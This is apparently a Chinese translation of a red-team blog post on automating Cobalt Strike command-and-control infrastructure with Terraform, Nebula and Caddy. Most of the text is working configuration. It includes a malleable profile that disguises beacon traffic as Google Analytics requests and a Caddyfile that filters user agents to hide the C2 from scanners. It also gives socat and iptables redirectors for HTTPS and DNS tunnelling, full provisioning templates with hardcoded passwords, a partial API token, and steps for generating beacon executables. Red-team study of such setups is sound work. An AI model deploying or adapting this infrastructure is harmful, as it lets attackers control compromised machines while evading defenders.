set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.39 Safari/537.36 Brave/75";set sleeptime "20000";https-certificate {set keystore "acme.store";set password "123456";}http-get {set uri "/___utm.gif"; client { parameter "utmac""UA-2202604-2"; parameter "utmcn""1"; parameter "utmcs""ISO-8859-1"; parameter "utmsr""1280x1024"; parameter "utmsc""32-bit"; parameter "utmul""en-US"; metadata { base64url; prepend "__utma"; parameter "utmcc"; } } server { header "Content-Type""image/gif"; output {# hexdump pixel.gif# 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00# 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00# 0000020 01 00 01 00 00 02 01 44 00 3b prepend "x01x00x01x00x00x02x01x44x00x3b"; prepend "xffxffxffx21xf9x04x01x00x00x00x2cx00x00x00x00"; prepend "x47x49x46x38x39x61x01x00x01x00x80x00x00x00x00";print; } }}http-post {set uri "/__utm.gif";set verb "GET"; client { id { prepend "UA-220"; append "-2"; parameter "utmac"; } parameter "utmcn""1"; parameter "utmcs""ISO-8859-1"; parameter "utmsr""1280x1024"; parameter "utmsc""32-bit"; parameter "utmul""en-US"; output { base64url; prepend "__utma"; parameter "utmcc"; } } server { header "Content-Type""image/gif"; output { prepend "x01x00x01x00x00x02x01x44x00x3b"; prepend "xffxffxffx21xf9x04x01x00x00x00x2cx00x00x00x00"; prepend "x47x49x46x38x39x61x01x00x01x00x80x00x00x00x00";print; } }}# dress up the staging process toohttp-stager {set uri_x86 "/_init.gif";set uri_x64 "/__init.gif"; server { header "Content-Type""image/gif"; output { prepend "x01x00x01x00x00x02x01x44x00x3b"; prepend "xffxffxffx21xf9x04x01x00x00x00x2cx00x00x00x00"; prepend "x47x49x46x38x39x61x01x00x01x00x80x00x00x00x00";print; } }}
一旦我选定了要使用的 C2 配置文件,我就会修改 Caddy 的配置以匹配路由。Caddy 的配置文件Caddyfile如下所示。
Caddyfile
{ admin off acme_ca https://acme-staging-v02.api.letsencrypt.org/directory}# Profile: https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/webbug_getonly.profile# User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.39 Safari/537.36 Brave/75EDGE_DOMAIN_NAME { log@user-agent-whitelist { header User-Agent *3770.39* } header { -Server +X-Robots-Tag "noindex, nofollow, nosnippet, noarchive" +X-Content-Type-Options "nosniff" } handle /_init.gif* { reverse_proxy @user-agent-whitelist https://192.168.100.110 { transport http { tls_insecure_skip_verify } } } handle /__init.gif* { reverse_proxy @user-agent-whitelist https://192.168.100.110 { transport http { tls_insecure_skip_verify } } } handle /__utm.gif* { reverse_proxy @user-agent-whitelist https://192.168.100.110 { transport http { tls_insecure_skip_verify } } } handle /___utm.gif* { reverse_proxy @user-agent-whitelist https://192.168.100.110 { transport http { tls_insecure_skip_verify } } } handle /* { redir https://docs.microsoft.com/en-us/windows/win32/debug/pe-format permanent }}
上述配置相当简单,仅internal-redirector-1当User-Agent匹配模式且访问了特定端点(_init.gif、__init.gif、__utm.gif、___utm.gif)时,才会将流量重定向到实例。所有其他请求都将重定向到 Microsoft Windows PE 格式文档页面。
下面有一个EDGE_DOMAIN_NAME占位符将被固定,因为以下命令将被添加到模板edge-redirector-1内的实例中edge-redirectors.tf。
wget https://github.com/caddyserver/caddy/releases/download/v2.5.2/caddy_2.5.2_linux_amd64.tar.gztar -C /usr/local/bin -xzf caddy_2.5.2_linux_amd64.tar.gzchmod +x /usr/local/bin/caddymv /tmp/Caddyfile .sed -i 's/EDGE_DOMAIN_NAME/${var.linode_domain}/g' Caddyfileecho'caddy run --watch' | at now + 1min
上述命令将下载 Caddy 并在连接到 Nebula 网络之前设置配置。
此时,我应该能够通过构建基础设施来测试上面所做的所有修改,以确保 HTTPS 服务器将根据特定规则重定向流量。
terraform apply
成功后,您应该会看到 14 个资源已成功创建且没有错误,并且output数据显示了所创建的每个实例的 IP 地址。
所有资源均已启动并运行,因此让我windows.pe在浏览器中检查域,以确保它按预期将所有非 C2 流量重定向到 Windows PE 格式文档页面。
由于我目前在测试过程中使用的是临时证书,因此您会看到类似上述的警告。一旦我迁移到生产环境 SSL,该警告就会被移除,但目前我选择继续。
请求按预期重定向到 Windows PE 格式文档页面。之所以选择此页面,是因为我使用的是域名windows.pe,而且大多数机器人和爬虫都会认为此页面只是重定向到 Windows 二进制文件的 PE 格式信息。
当使用 C2 配置文件中描述的特定User-Agent端点时,我将得到以下响应,这是预期的,因为我还没有通过实例路由流量internal-redirector-1。
现在我知道 HTTPS 服务器配置运行良好,我可以开始研究重定向器了。
HTTPS 重定向器设置
为了将 HTTPS C2 流量隧道传输到team server实例,我必须确保每个步骤都有一种将数据重定向到下一个节点的方法。以下路径将用于 HTTPS C2 流量。
edge-redirector-1--> internal-redirector-1-->team-server
目前,该edge-redirector-1实例正在将 HTTPS 流量重定向到internal-redirector-1已使用配置reverse_proxy中的指令的实例Caddyfile。
需要internal-redirector-1将端口 443 上的传入 HTTPS 流量通过隧道传输到team-server同样位于端口 443 上的实例,对于此特定的重定向,我将使用socat。以下命令将添加到internal-redirector-2实例remote-exec配置程序,以安装socat并运行相应的重定向流量的命令。
aptinstallsocat-ysocatTCP4-LISTEN:443,forkTCP4:192.168.100.200:443
上述命令将在端口 443 上启动监听器,并将传入的 HTTPS 流量重定向到team-server在 Nebula IP 上运行的实例192.168.100.200。
现在,C2 team-server将能够在端口 443 上监听 HTTPS C2 流量。
DNS 重定向器设置
为了将 DNS C2 流量隧道传输到team-server实例,我必须确保每个步骤都有一种将 DNS 数据重定向到下一个节点的方法。以下路径将用于 DNS C2 流量。
edge-redirector-2--> internal-redirector-2-->team-server
因为这三个 (3) 个实例将处理 DNS 流量,所以它们每个都需要在其remote-exec配置程序中添加一些命令来删除systemd-resolved服务并向/etc/resolv.conf文件中添加一些名称服务器条目。
要添加的命令如下。
systemctl disable systemd-resolved.servicesystemctl stop systemd-resolvedrm -f /etc/resolv.confecho'nameserver 8.8.8.8' >> /etc/resolv.confecho'nameserver 8.8.4.4' >> /etc/resolv.conf
将上述命令添加到所有三个个实例后,我就可以专注于在edge-redirector-2实例上添加重定向器,iptables如下所示。
iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPTiptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.100.120:53iptables -t nat -A POSTROUTING -j MASQUERADEiptables -I FORWARD -j ACCEPTiptables -P FORWARD ACCEPTsysctl net.ipv4.ip_forward=1
上述命令获取 UDP 端口 53 上的传入 DNS 流量,并internal-redirector-2使用 Nebula IP 192.168.100.120端口 53 将其重定向到实例。
现在流量来自edge-redirector-2实例,并通过重定向到internal-redirector-2实例iptables,我需要将传入的 DNS 流量重定向到team-server实例,然后再次使用iptables如下所示。
iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPTiptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.100.200:53iptables -t nat -A POSTROUTING -j MASQUERADEiptables -I FORWARD -j ACCEPTiptables -P FORWARD ACCEPTsysctl net.ipv4.ip_forward=1
edge-redirector-2这应该完成从实例到team-server实例通过实例的DNS 隧道internal-redirector-2。
防火墙设置
此时,在继续设置 C2 框架之前,最后要做的是在操作系统级别为每个虚拟机实例设置一些防火墙规则,这样除了操作正常运行所需的少数服务外,不会有任何服务暴露在互联网上。我将使用ufw
灯塔(192.168.100.1)
-
允许 SSH
ufw allow ssh
-
允许 4242/udp
ufw allow 4242/udp
边缘重定向器-1(HTTPS - 192.168.100.10)
-
允许 SSH
ufw allow ssh
-
允许 HTTP
ufw allow 80
-
允许 HTTPS
ufw allow 443
-
允许 4242/udp
ufw allow 4242/udp
-
允许 192.168.100.110
ufw allow from 192.168.100.110
内部重定向器-1(HTTPS - 192.168.100.110)
-
允许 SSH
ufw allow ssh
-
允许 4242/udp
ufw allow 4242/udp
-
允许 192.168.100.10
ufw allow from 192.168.100.10
-
允许 192.168.100.200
ufw allow from 192.168.100.200
边缘重定向器-2(DNS - 192.168.100.20)
-
允许 SSH
ufw allow ssh
-
允许 53/udp
ufw allow 53/udp
-
允许 4242/udp
ufw allow 4242/udp
-
允许 192.168.100.120
ufw allow from 192.168.100.120
内部重定向器-2(DNS - 192.168.100.120)
-
允许 SSH
ufw allow ssh
-
允许 4242/udp
ufw allow 4242/udp
-
允许 192.168.100.20
ufw allow from 192.168.100.20
-
允许 192.168.100.200
ufw allow from 192.168.100.200
团队服务器(192.168.100.200)
-
允许 SSH
ufw allow ssh
-
允许 4242/udp
ufw allow 4242/udp
-
允许 192.168.100.110
ufw allow from 192.168.100.110
-
允许 192.168.100.120
ufw allow from 192.168.100.120
-
允许 192.168.100.250
ufw allow from 192.168.100.250
使用 为每个实例编写完上述所有规则后, 、和模板ufw的最终版本将完成,如下所示。模板将在下一节关于 C2 框架设置中完成。lighthouse.tfedge-redirectors.tfinternal-redirectors.tfteam-server.tf
lighthouse.tf
resource"linode_instance""lighthouse" {label = "lighthouse" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-lighthouse.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/lighthouse1.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/lighthouse1.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","ufw allow 22","ufw allow 4242/udp","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","echo 'ufw --force enable' | at now + 1 min","touch /tmp/task.complete" ] }}
edge-redirectors.tf
# HTTPS Dedicated Redirectorresource"linode_instance""edge-redirector-1" {label = "edge-redirector-1" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-edge.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "configs/web/Caddyfile.txt" destination = "/tmp/Caddyfile" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/edge-redirector-1.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/edge-redirector-1.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","ufw allow 22","ufw allow 80","ufw allow 443","ufw allow 4242/udp","ufw allow from 192.168.100.110","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","wget https://github.com/caddyserver/caddy/releases/download/v2.5.2/caddy_2.5.2_linux_amd64.tar.gz","tar -C /usr/local/bin -xzf caddy_2.5.2_linux_amd64.tar.gz","chmod +x /usr/local/bin/caddy","mv /tmp/Caddyfile .","sed -i 's/EDGE_DOMAIN_NAME/${var.linode_domain}/g' Caddyfile","echo 'caddy run --watch' | at now + 1 min","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","echo 'ufw --force enable' | at now + 1 min","touch /tmp/task.complete" ] }}# DNS Dedicated Redirectorresource "linode_instance""edge-redirector-2" {label = "edge-redirector-2" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-edge.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/edge-redirector-2.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/edge-redirector-2.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","ufw allow 22","ufw allow 53/udp","ufw allow 4242/udp","ufw allow from 192.168.100.120","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","systemctl disable systemd-resolved.service","systemctl stop systemd-resolved","rm -f /etc/resolv.conf","echo 'nameserver 8.8.8.8' >> /etc/resolv.conf","echo 'nameserver 8.8.4.4' >> /etc/resolv.conf","iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT","iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.100.120:53","iptables -t nat -A POSTROUTING -j MASQUERADE","iptables -I FORWARD -j ACCEPT","iptables -P FORWARD ACCEPT","sysctl net.ipv4.ip_forward=1","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","echo 'ufw --force enable' | at now + 1 min","touch /tmp/task.complete" ] }}
internal-redirectors.tf
# HTTPS Dedicated Internal Redirectorresource"linode_instance""internal-redirector-1" {label = "internal-redirector-1" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-internal.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/internal-redirector-1.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/internal-redirector-1.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","ufw allow 22","ufw allow 4242/udp","ufw allow from 192.168.100.10","ufw allow from 192.168.100.200","apt install socat -y","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo 'socat TCP4-LISTEN:443,fork TCP4:192.168.100.200:443' | at now + 1 min","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","echo 'ufw --force enable' | at now + 1 min","touch /tmp/task.complete" ] }}# DNS Dedicated Internal Redirectorresource "linode_instance""internal-redirector-2" {label = "internal-redirector-2" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-internal.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/internal-redirector-2.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/internal-redirector-2.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","ufw allow 22","ufw allow 4242/udp","ufw allow from 192.168.100.20","ufw allow from 192.168.100.200","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","systemctl disable systemd-resolved.service","systemctl stop systemd-resolved","rm -f /etc/resolv.conf","echo 'nameserver 8.8.8.8' >> /etc/resolv.conf","echo 'nameserver 8.8.4.4' >> /etc/resolv.conf","iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT","iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.100.200:53","iptables -t nat -A POSTROUTING -j MASQUERADE","iptables -I FORWARD -j ACCEPT","iptables -P FORWARD ACCEPT","sysctl net.ipv4.ip_forward=1","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","echo 'ufw --force enable' | at now + 1 min","touch /tmp/task.complete" ] }}
设置好防火墙规则并完成上述模板后,我现在终于可以专注于team-server实例了。
C2 设置
我要做的第一件事是将其添加到目录cobaltstrike.zip中src/templates/files,因为它需要移动到team-server实例中。
现在,我需要使用 SSL key和crtCaddy 在 HTTP/S 服务器配置期间生成的文件创建一个 Java 密钥库。这些文件存储在edge-redirector-1实例上的特定位置,因此我需要向remote-exec配置程序添加一些命令,以便将scp这些文件添加到team-server实例中,以便它们可用于 Java 密钥库的设置。
我还需要设置两个新的file配置程序,用于将文件从操作员主机移动 cobaltstrike.zip到webbug_getonly.profile实例/tmp上的目录team-server。但首先,我需要在team-server实例上安装 Java。
apt install openjdk-17-jre -y
为了登录edge-redirector-1实例的scpSSL 密钥,我需要使用在早期开发步骤中在文件tls_private_key中创建的资源。security.tf
echo'${tls_private_key.temp_key.private_key_pem}' > /root/temp_key
使用存储在中的密钥,/root/temp_key我可以scp使用更改密钥文件的安全权限后访问文件chmod。
chmod 600 /root/temp_keyscp -oStrictHostKeyChecking=no -i /root/temp_key root@${linode_instance.edge-redirector-1.ip_address}:/root/.local/share/caddy/certificates/acme-staging-v02.api.letsencrypt.org-directory/${var.cloudflare_domain}/* .
注意:/root/.local/share/caddy/certificates/acme-staging-v02.api.letsencrypt.org-directory/当您切换到生产级 SSL 证书时,位于的目录可能会发生变化,但出于测试目的,此目录是没问题的。
一旦密钥被移动到team-server实例,我将需要将单独的公共文件和私有文件合并为一个 PKCS12 文件,openssl如下所示。
openssl pkcs12 -inkey ${var.cloudflare_domain}.key -in${var.cloudflare_domain}.crt -export -out acme.pkcs12 -passout pass:123456
一旦生成文件,就可以使用如下所示的工具acme.pkcs12将 PKCS12 文件转换为 Java KeyStore 。keytool
keytool-noprompt-importkeystore-srckeystoreacme.pkcs12-srcstoretypepkcs12-destkeystoreacme.store-deststorepass 123456 -destkeypass 123456 -srcstorepass 123456
上述命令将生成acme.store将用作 C2 配置文件一部分的文件,因此我将把它移动到/opt/cobaltstrike4.4/目录中。最后要运行的命令是teamserver使用acme.store和 来启动webbug_getonly.profile。
cd /opt/cobaltstrike4.4/ && ./teamserver 192.168.100.200 password! webbug_getonly.profile
注意:random_string当然,通过在模板中添加另外 2 个指令,可以轻松替换或完全自动化此构建中使用的任何密码security.tf,但为了演示,它们可以作为默认值。
这是team-server.tf完成上述修改后的模板。
team-server.tf
resource"linode_instance""team-server" {label = "team-server" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-teamserver.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/team-server.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/team-server.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","apt-get install unzip -y","apt-get install openjdk-17-jre -y","apt-get install openjdk-17-jre -y", # short-cut to set as default"ufw allow 22","ufw allow 4242/udp","ufw allow from 192.168.100.110","ufw allow from 192.168.100.120","ufw allow from 192.168.100.250","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","mv /tmp/cobaltstrike.zip .","unzip cobaltstrike.zip -d /opt","mv /tmp/webbug_getonly.profile /opt/cobaltstrike4.4/","echo '${tls_private_key.temp_key.private_key_pem}' > /root/temp_key","chmod 600 /root/temp_key","scp -oStrictHostKeyChecking=no -i /root/temp_key root@${linode_instance.edge-redirector-1.ip_address}:/root/.local/share/caddy/certificates/acme-staging-v02.api.letsencrypt.org-directory/${var.linode_domain}/* .","openssl pkcs12 -inkey ${var.linode_domain}.key -in ${var.linode_domain}.crt -export -out acme.pkcs12 -passout pass:123456","keytool -noprompt -importkeystore -srckeystore acme.pkcs12 -srcstoretype pkcs12 -destkeystore acme.store -deststorepass 123456 -destkeypass 123456 -srcstorepass 123456","cp acme.store /opt/cobaltstrike4.4/","systemctl disable systemd-resolved.service","systemctl stop systemd-resolved","rm -f /etc/resolv.conf","echo 'nameserver 8.8.8.8' >> /etc/resolv.conf","echo 'nameserver 8.8.4.4' >> /etc/resolv.conf","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","echo 'cd /opt/cobaltstrike4.4/ && ./teamserver 192.168.100.200 password! webbug_getonly.profile' | at now + 1 min","echo 'ufw --force enable' | at now + 1 min","touch /tmp/task.complete" ] }}
因此,让我再启动一次,以验证一切是否正常工作。
terraform apply
ssh -i keys/red_nebula_rsa root@172.104.29.249
然后使用以下命令检查是否teamserver在端口上运行。50050
ss -tupln
成功!teamserver正在运行,显示为javaon port 50050。这意味着 SSL 证书已正确复制,新的 KeyStore 已构建,并且 C2 配置文件已完全加载并准备就绪!
我几乎完成了 C2 自动化构建,只需通过连接操作员并测试 HTTPS 和 DNS 信标来完成。
操作员设置
在 C2 基础设施搭建完毕并准备就绪后,运营人员只需将“Lighthouse”的 IP 地址添加到目录config-operator.yaml中的配置文件中即可/tmp/nebula。我没有自动执行此过程,因为运营人员可能使用的不是构建基础设施的同一台机器。不过,任何运营人员只需要该config-operator.yaml文件以及与该运营人员关联的 3 个密钥(这些密钥也位于/tmp/nebula目录中)。
sed -i 's/LIGHTHOUSE_IP_ADDRESS/172.104.29.143/g' config-operator.yaml
一旦设置了IP,以下命令将连接到Nebula网络。
sudo ./nebula -config config-operator.yaml
连接良好,操作员现在可以访问team-server端口 上的实例50050。
接下来我将在操作员机器上启动 Cobalt Strike 以连接到team-server实例。
/opt/c2/cobaltstrike/start.sh
在这里我将设置一些连接输入值来建立与“Team-Server”的连接。
连接成功后,我将设置两个监听器,一个用于 HTTPS 流量,另一个用于 DNS。对于 HTTPS 监听器,我将使用主机名,windows.pe因为这是团队服务器的入口点。我使用的选项如下所示。
将设置设置为 C2 HTTPS 边缘域后,请“保存”侦听器并确保没有错误。接下来,我将使用刚刚创建的 HTTPS 侦听器生成一个 Windows 可执行文件来测试信标。
一旦生成 Windows 可执行文件,我将把它移动到易受攻击的机器上,以便我可以测试信标。
新创建的信标几乎立刻就弹出来了,没有任何问题!这表明 HTTPS 信标正在路由我之前创建的所有规则和隧道,并且顺利到达了团队服务器。
现在是时候创建 DNS 侦听器了,其中的选项略有不同,因为我将使用 DNS 服务器和子域将 UDP 流量直接路由到团队服务器。
与上次相同的例程,“保存”监听器,然后生成 Windows 可执行文件以在易受攻击的机器上进行测试,并在几分钟内检查结果。
成功!两个 Beacon 运行正常,没有错误。自动构建过程实际上会将一个活跃的 Cobalt Strike 团队服务器转储到操作员实验室中,整个构建过程只需大约五分钟。
用 Python 结束
自动化完成后,我将把 Terraform 构建器和逻辑包装到一个简洁的小型 Python 工具中,该工具将按需启动和销毁基础设施。
在开始构建此脚本之前,我需要安装两个 Python 模块来帮助实现逻辑。这两个模块分别是pyyaml和python-terraform,可以使用以下命令安装。
pip install pyyamlpip install python-terraform
一旦安装了这两个(2)模块,我将在目录network.yaml中添加一个名为的文件src/config/,该文件将存储 Linode API 密钥和域,如下所示。
network.yaml
linode:token: 920fd6f3d417600c871ff...domain: windows.pe
此时配置非常简单,列出了存储在文件value中的Linode 值,因此接下来我将从中variables.tf删除数据,因为从现在开始这些值将存储在这里。valuevariables.tf
variables.tf
variable"linode_token" {description = "The Linode API Token"}variable "linode_domain" {description = "The domain to be used at Linode"}
如你所见,我删除了value测试过程中存在的指令。现在回到 Python 项目根文件夹,我将创建一个名为 的文件,c2_build.py其中包含以下内容。
c2_build.py
from python_terraform import Terraform, IsFlaggedfrom yaml import safe_load, YAMLErrordefbuild(template: str, token: str, domain: str) -> dict: tf = Terraform(working_dir=template) ret, stdout, stderr = tf.apply( capture_output=True, no_color=IsFlagged, skip_plan=True, var={'linode_token': token, 'linode_domain': domain})if stdout:return tf.output()if stderr: print(stderr)return {}defdestroy(template: str, token: str, domain: str) -> None: tf = Terraform(working_dir=template) ret, stdout, stderr = tf.destroy( capture_output=True, auto_approve=True, force=None, var={'linode_token': token, 'linode_domain': domain})if stdout: print("[*] C2 Build destruction complete!n")if stderr: print(stderr)if __name__ == "__main__":import os _token: str = "" _domain: str = "" _template: str = "src/templates"if os.name == 'nt': print("[!] This tool requires the Linux operating system. Exiting.n") exit(1) print("[*] Pulling configuration from src/config/network.yaml")try:with open('src/config/network.yaml', 'r') as file: data = safe_load(file) _token = data['linode']['token'] _domain = data['linode']['domain']except (OSError, YAMLError): print("[!] Error parsing the YAML configuration file.n") exit(1) print("[*] Building network...") output: dict = build(_template, _token, _domain) print("[*] Output from build...")for x in output: print(f"Instance {x} has IP {output[x]['value']}") input("nPress any key to destroy build...") print("[*] Destroying network...") destroy(_template, _token, _domain)
这是一个简单的 PoC 脚本,旨在演示如何将复杂的 Terraform 构建迁移到 Python 中,以实现更高级别的自定义。我目前正在构建的工具将更多地使用 Python 来为操作员提供更多功能,但此处的构建旨在演示如何快速构建您自己的自定义 C2 基础设施。
这是运行时的脚本。
只需一个命令,操作员现在就可以拥有一个功能齐全的 C2,运行他们最喜欢的框架,而无需大约五分钟的总构建时间,其中包括 DNS 和带有 SSL 的 HTTPS。
就这样,我完成了。“红色星云”工具的正式版目前正在开发中,预计一个月左右就能完成。
原文始发于微信公众号(Ots安全):使用 Terraform、Nebula、Caddy 和 Cobalt Strike 实现 C2 基础设施自动化
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论